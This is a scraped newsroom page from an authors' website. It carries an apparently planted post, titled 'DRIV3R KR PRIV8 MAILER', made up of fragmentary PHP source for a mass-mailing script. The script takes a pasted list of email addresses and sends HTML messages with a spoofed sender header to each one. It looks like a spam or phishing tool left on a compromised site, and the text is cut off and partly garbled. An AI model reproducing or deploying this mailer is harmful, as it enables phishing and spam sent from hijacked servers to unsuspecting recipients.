Skip to main content
Peter and Sheila Forrest
Toggle navigation
Bookstore
The Authors
Newsroom
Bookstore
Ordering Information
Web Design by Sprout
Historians & Writers
You are here
Home
amine
← Back to the Newsroom
amine
Post date:
22 December 2017
DRIV3R KR PRIV8 MAILER
'; $to = $_POST['emails']; $email = explode("\n", $to); $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $ok = "ok"; $headers = "MIME-Version: 1.0\n"; $headers .= "Content-Type: text/html; charset=UTF-8\n"; $headers .= 'From: ' . $from_mail . "\r\n"; if(mail($email[$i], $subject, $message, $headers)) echo "
Number: $count
".$email[$i]."
Rezult inchallah....!
"; else echo "
Number: $count
".$email[$i]."
Error in Sending ??
"; $i++; $count++; } $count--; if($ok == "ok") echo ""; } ?>